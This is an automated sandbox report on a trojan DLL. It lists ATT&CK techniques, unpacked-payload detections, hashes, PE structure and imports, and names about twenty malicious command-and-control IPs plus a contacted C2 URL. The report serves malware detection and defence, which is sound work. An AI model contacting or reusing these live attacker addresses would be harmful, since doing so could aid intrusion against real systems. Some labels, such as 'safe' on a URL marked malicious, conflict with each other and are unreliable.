Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	System Information Discovery25	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MakbLShaqA.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.1120000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.5370000.11.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.51b0000.7.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4640000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.48c0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.5210000.9.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4e20000.5.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4800000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.4e40000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.5000000.7.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.5160000.9.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.52b0000.13.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.54e0000.17.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.51c0000.11.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.5050000.5.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.53d0000.15.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
6.2.rundll32.exe.4800000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://51.178.61.60/SYSKBGIBxTUBdowZhTVfUaAYAEzgMuUlGOoLKDNLDTiFBTiWsXq	0%	Avira URL Cloud	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://51.178.61.60/SYSKBGIBxTUBdowZhTVfUaAYAEzgMuUlGOoLKDNLDTiFBTiWsXq	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 0000000F.00000003.780940609.000001AFFBB7F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.yahoo.com	rundll32.exe, rundll32.exe, 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.671940054.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.676274983.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.1193366310.0000000010056000.00000002.00020000.sdmp, MakbLShaqA.dll	false		high
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 0000000F.00000003.780940609.000001AFFBB7F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 0000000F.00000003.782138696.000001AFFBBD1000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782167788.000001AFFBB99000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782205391.000001AFFC002000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782120718.000001AFFBBD1000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782195700.000001AFFBB77000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782175989.000001AFFBBBA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 0000000F.00000003.780940609.000001AFFBB7F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 0000000F.00000003.780940609.000001AFFBB7F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528565
Start date:	25.11.2021
Start time:	14:04:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MakbLShaqA (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winDLL@18/0@0/20
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.3% (good quality ratio 26%) Quality average: 73.5% Quality standard deviation: 29%
HCA Information:	Successful, ratio: 80% Number of executed functions: 67 Number of non-executed functions: 176
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.54.110.249 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/528565/sample/MakbLShaqA.dll

Simulations

Behavior and APIs

Time	Type	Description
14:06:44	API Interceptor	7x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	tUJXpPwU27.dll	Get hash	malicious	Browse
	pYebrdRKvR.dll	Get hash	malicious	Browse
	pPX9DaPVYj.dll	Get hash	malicious	Browse
	wUKXjICs5f.dll	Get hash	malicious	Browse
	cRC6TZG6Wx.dll	Get hash	malicious	Browse
	qrb6jVwzoe.dll	Get hash	malicious	Browse
	1711.doc	Get hash	malicious	Browse
	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
196.44.98.190	tUJXpPwU27.dll	Get hash	malicious	Browse
	pYebrdRKvR.dll	Get hash	malicious	Browse
	pPX9DaPVYj.dll	Get hash	malicious	Browse
	wUKXjICs5f.dll	Get hash	malicious	Browse
	cRC6TZG6Wx.dll	Get hash	malicious	Browse
	qrb6jVwzoe.dll	Get hash	malicious	Browse
	1711.doc	Get hash	malicious	Browse
	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	OPKyR75fJn.exe	Get hash	malicious	Browse	149.28.253.196
	Ljm7n1QDZe	Get hash	malicious	Browse	68.232.173.117
	Jx35I5pwgd	Get hash	malicious	Browse	66.42.54.65
	tUJXpPwU27.dll	Get hash	malicious	Browse	66.42.57.149
	LZxr7xI4nc.exe	Get hash	malicious	Browse	149.28.253.196
	3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exe	Get hash	malicious	Browse	149.28.253.196
	5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exe	Get hash	malicious	Browse	149.28.253.196
	asbestos_safety_and_eradication_agency_enterprise_agreement 41573 .js	Get hash	malicious	Browse	45.76.154.237
	23062BA932165210EBB3FFCD15474E79F19E6AD74869F.exe	Get hash	malicious	Browse	149.28.253.196
	DA8063D9EB60622915D492542A6A8AE318BC87B4C5F89.exe	Get hash	malicious	Browse	155.138.201.103
	asbestos_safety_and_eradication_agency_enterprise_agreement 64081 .js	Get hash	malicious	Browse	45.76.154.237
	pYebrdRKvR.dll	Get hash	malicious	Browse	66.42.57.149
	pPX9DaPVYj.dll	Get hash	malicious	Browse	66.42.57.149
	wUKXjICs5f.dll	Get hash	malicious	Browse	66.42.57.149
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	66.42.57.149
	qrb6jVwzoe.dll	Get hash	malicious	Browse	66.42.57.149
	AWB_NO_9284730932.exe	Get hash	malicious	Browse	45.32.28.45
	arm6-20211124-0649	Get hash	malicious	Browse	44.168.42.223
	6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exe	Get hash	malicious	Browse	149.28.253.196
	FhP4JYCU7J.exe	Get hash	malicious	Browse	149.28.253.196
EcobandGH	tUJXpPwU27.dll	Get hash	malicious	Browse	196.44.98.190
	pYebrdRKvR.dll	Get hash	malicious	Browse	196.44.98.190
	pPX9DaPVYj.dll	Get hash	malicious	Browse	196.44.98.190
	wUKXjICs5f.dll	Get hash	malicious	Browse	196.44.98.190
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	196.44.98.190
	qrb6jVwzoe.dll	Get hash	malicious	Browse	196.44.98.190
	1711.doc	Get hash	malicious	Browse	196.44.98.190
	n6J7QJs4bk.dll	Get hash	malicious	Browse	196.44.109.73
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	196.44.98.190
	wNjqkrm8pH.dll	Get hash	malicious	Browse	196.44.98.190
	5YO8hZg21O.dll	Get hash	malicious	Browse	196.44.98.190
	dUGnMYeP1C.dll	Get hash	malicious	Browse	196.44.98.190
	yFAXc9z51V.dll	Get hash	malicious	Browse	196.44.98.190
	9fC0as7YLE.dll	Get hash	malicious	Browse	196.44.98.190
	FIyE6huzxV.dll	Get hash	malicious	Browse	196.44.98.190
	V0gZWRXv8d.dll	Get hash	malicious	Browse	196.44.98.190
	t5EuQW2GUF.dll	Get hash	malicious	Browse	196.44.98.190
	uh1WyesPlh.dll	Get hash	malicious	Browse	196.44.98.190
	8rryPzJR1p.dll	Get hash	malicious	Browse	196.44.98.190
	a65FgjVus4.dll	Get hash	malicious	Browse	196.44.98.190

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	lhvzcskYLPyellowfacebrownietacohead.dll	Get hash	malicious	Browse	51.178.61.60
	vacehcp3Zv.dll	Get hash	malicious	Browse	51.178.61.60
	SecuriteInfo.com.Drixed-FJX5EDC20B587B4.1828.dll	Get hash	malicious	Browse	51.178.61.60
	SecuriteInfo.com.Suspicious.Win32.Save.a.20268.dll	Get hash	malicious	Browse	51.178.61.60
	PSVSotIVGj.dll	Get hash	malicious	Browse	51.178.61.60
	ivXBh7Nwmt.dll	Get hash	malicious	Browse	51.178.61.60
	34PZXoE0JJ.dll	Get hash	malicious	Browse	51.178.61.60
	jPzSCuyellowfacebrownietacohead.dll	Get hash	malicious	Browse	51.178.61.60
	pYebrdRKvR.dll	Get hash	malicious	Browse	51.178.61.60
	pPX9DaPVYj.dll	Get hash	malicious	Browse	51.178.61.60
	wUKXjICs5f.dll	Get hash	malicious	Browse	51.178.61.60
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	51.178.61.60
	qrb6jVwzoe.dll	Get hash	malicious	Browse	51.178.61.60
	ReadMe[2021.11.22_12-15].vbs	Get hash	malicious	Browse	51.178.61.60
	cTplVWrqRR.dll	Get hash	malicious	Browse	51.178.61.60
	NErdgsNsKR.vbs	Get hash	malicious	Browse	51.178.61.60
	F.A.Q[2021.11.22_12-15].vbs	Get hash	malicious	Browse	51.178.61.60
	Q1KL4ickDw.dll	Get hash	malicious	Browse	51.178.61.60
	yZGYbaJ.dll	Get hash	malicious	Browse	51.178.61.60
	1711.doc	Get hash	malicious	Browse	51.178.61.60

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.907606201813591
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 94.34% InstallShield setup (43055/19) 4.05% Windows Screen Saver (13104/52) 1.23% Generic Win/DOS Executable (2004/3) 0.19% DOS Executable Generic (2002/1) 0.19%
File name:	MakbLShaqA.dll
File size:	668672
MD5:	d8f093871cd90d160aa42b945f68e229
SHA1:	bed9b13fc1caeab0d9ee69c7ee9a3fc7939c04d5
SHA256:	778db11e074622c21181ac26eaead6bb1c8e60d4aee8b7df810ffffbd03b2064
SHA512:	a9bf951c3d0f699e038ab092eb43db2156815ff9cc9845ff24921db1f5e32fef59f020719733d55d95819cdcfbadaf84cb4fdfca47981e31b0bf692433eb005f
SSDEEP:	12288:ZLqntrsKNni3jR34UrmTMQFQIBV+5UZF/imMG:Z2trTZwF34LTkZkom5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Je.....T...T...T)..T...T)..T...T...T%..T.VST...T.VET...T.VBT...T.VLT...T.VTT...T.VRT...T.VWT...TRich...T.......................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1003ff7f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x619E9E08 [Wed Nov 24 20:18:16 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	cb788e621f390567a1ec94b8d2369e89

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F12950E29F7h
call 00007F12950EB7C7h
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007F12950E28E1h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+10h]
mov eax, edi
sub eax, 00000000h
je 00007F12950E3FDBh
dec eax
je 00007F12950E3FC3h
dec eax
je 00007F12950E3F8Eh
dec eax
je 00007F12950E3F3Fh
dec eax
je 00007F12950E3EAFh
mov ecx, dword ptr [ebp+0Ch]
mov eax, dword ptr [ebp+08h]
push ebx
push 00000020h
pop edx
jmp 00007F12950E2E67h
mov esi, dword ptr [eax]
cmp esi, dword ptr [ecx]
je 00007F12950E2A6Eh
movzx esi, byte ptr [eax]
movzx ebx, byte ptr [ecx]
sub esi, ebx
je 00007F12950E2A07h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F12950E2E5Fh
movzx esi, byte ptr [eax+01h]
movzx ebx, byte ptr [ecx+01h]
sub esi, ebx
je 00007F12950E2A07h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F12950E2E3Eh
movzx esi, byte ptr [eax+02h]
movzx ebx, byte ptr [ecx+02h]
sub esi, ebx
je 00007F12950E2A07h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F12950E2E1Dh

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x6be10	0x4e	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6996c	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x97000	0x7160	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9f000	0x6ea0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x61180	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x56000	0x708	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x698bc	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5487c	0x54a00	False	0.557670559453	data	6.55778526171	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x56000	0x15e5e	0x16000	False	0.312444513494	data	5.09323776174	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6c000	0x2a394	0x26800	False	0.943314985795	data	7.9074320255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x97000	0x7160	0x7200	False	0.260450932018	data	3.9170647287	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9f000	0xab2e	0xac00	False	0.364280523256	data	5.0366284188	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x980c0	0x134	data	English	United States
RT_CURSOR	0x981f4	0xb4	data	English	United States
RT_CURSOR	0x982a8	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x983dc	0x134	data	English	United States
RT_CURSOR	0x98510	0x134	data	English	United States
RT_CURSOR	0x98644	0x134	data	English	United States
RT_CURSOR	0x98778	0x134	data	English	United States
RT_CURSOR	0x988ac	0x134	data	English	United States
RT_CURSOR	0x989e0	0x134	data	English	United States
RT_CURSOR	0x98b14	0x134	data	English	United States
RT_CURSOR	0x98c48	0x134	data	English	United States
RT_CURSOR	0x98d7c	0x134	data	English	United States
RT_CURSOR	0x98eb0	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x98fe4	0x134	data	English	United States
RT_CURSOR	0x99118	0x134	data	English	United States
RT_CURSOR	0x9924c	0x134	data	English	United States
RT_CURSOR	0x99380	0x134	data	English	United States
RT_CURSOR	0x994b4	0xb4	data	English	United States
RT_BITMAP	0x99568	0x428	data	English	United States
RT_BITMAP	0x99990	0x8d8	data	English	United States
RT_BITMAP	0x9a268	0xb8	data	English	United States
RT_BITMAP	0x9a320	0x144	data	English	United States
RT_MENU	0x9a464	0x35e	data	English	United States
RT_MENU	0x9a7c4	0x2a	data	English	United States
RT_DIALOG	0x9a7f0	0xe8	data	English	United States
RT_DIALOG	0x9a8d8	0x1a2	data	English	United States
RT_DIALOG	0x9aa7c	0x15a	data	English	United States
RT_DIALOG	0x9abd8	0x34	data	English	United States
RT_STRING	0x9ac0c	0x72	data	English	United States
RT_STRING	0x9ac80	0xee	data	English	United States
RT_STRING	0x9ad70	0x30	data	English	United States
RT_STRING	0x9ada0	0x23e	data	English	United States
RT_STRING	0x9afe0	0x280	data	English	United States
RT_STRING	0x9b260	0x244	data	English	United States
RT_STRING	0x9b4a4	0x1aa	data	English	United States
RT_STRING	0x9b650	0xba	data	English	United States
RT_STRING	0x9b70c	0x92	data	English	United States
RT_STRING	0x9b7a0	0x3a	data	English	United States
RT_STRING	0x9b7dc	0x296	data	English	United States
RT_STRING	0x9ba74	0x260	data	English	United States
RT_STRING	0x9bcd4	0x328	data	English	United States
RT_STRING	0x9bffc	0x70	data	English	United States
RT_STRING	0x9c06c	0x106	data	English	United States
RT_STRING	0x9c174	0xda	data	English	United States
RT_STRING	0x9c250	0x46	data	English	United States
RT_STRING	0x9c298	0xc6	data	English	United States
RT_STRING	0x9c360	0x1f8	data	English	United States
RT_STRING	0x9c558	0x86	data	English	United States
RT_STRING	0x9c5e0	0xd0	data	English	United States
RT_STRING	0x9c6b0	0x2a	data	English	United States
RT_STRING	0x9c6dc	0x184	data	English	United States
RT_STRING	0x9c860	0x124	data	English	United States
RT_STRING	0x9c984	0x4e6	data	English	United States
RT_STRING	0x9ce6c	0x264	data	English	United States
RT_STRING	0x9d0d0	0x2da	data	English	United States
RT_STRING	0x9d3ac	0x8a	data	English	United States
RT_STRING	0x9d438	0xac	data	English	United States
RT_STRING	0x9d4e4	0xde	data	English	United States
RT_STRING	0x9d5c4	0x4a8	data	English	United States
RT_STRING	0x9da6c	0x228	data	English	United States
RT_STRING	0x9dc94	0x2c	data	English	United States
RT_STRING	0x9dcc0	0x42	data	English	United States
RT_ACCELERATOR	0x9dd04	0x80	data	English	United States
RT_ACCELERATOR	0x9dd84	0x18	data	English	United States
RT_GROUP_CURSOR	0x9dd9c	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_CURSOR	0x9ddc0	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_CURSOR	0x9dde4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9ddf8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9de0c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9de20	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9de34	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9de48	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9de5c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9de70	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9de84	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9de98	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9deac	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9dec0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9ded4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x9dee8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_MANIFEST	0x9defc	0x15a	ASCII text, with CRLF line terminators	English	United States
None	0x9e058	0xaa	data	English	United States
None	0x9e104	0x1e	data	English	United States
None	0x9e124	0x3a	data	English	United States

Imports

DLL	Import
KERNEL32.dll	Sleep, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, HeapDestroy, VirtualFree, GetStdHandle, GetACP, IsValidCodePage, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, InitializeCriticalSectionAndSpinCount, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CompareStringW, SetEnvironmentVariableA, RaiseException, RtlUnwind, HeapReAlloc, GetCommandLineA, VirtualQuery, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapAlloc, HeapFree, GetTickCount, GetCurrentDirectoryA, GetFileSizeEx, LocalFileTimeToFileTime, FileTimeToLocalFileTime, CreateFileA, GetShortPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GetStringTypeExA, DeleteFileA, MoveFileA, GetOEMCP, GetCPInfo, InterlockedIncrement, GetModuleHandleW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, SystemTimeToFileTime, FileTimeToSystemTime, GetThreadLocale, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, lstrcmpiA, LocalAlloc, LocalLock, LocalUnlock, InterlockedDecrement, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, InterlockedExchange, lstrcmpA, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, CloseHandle, FreeResource, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, 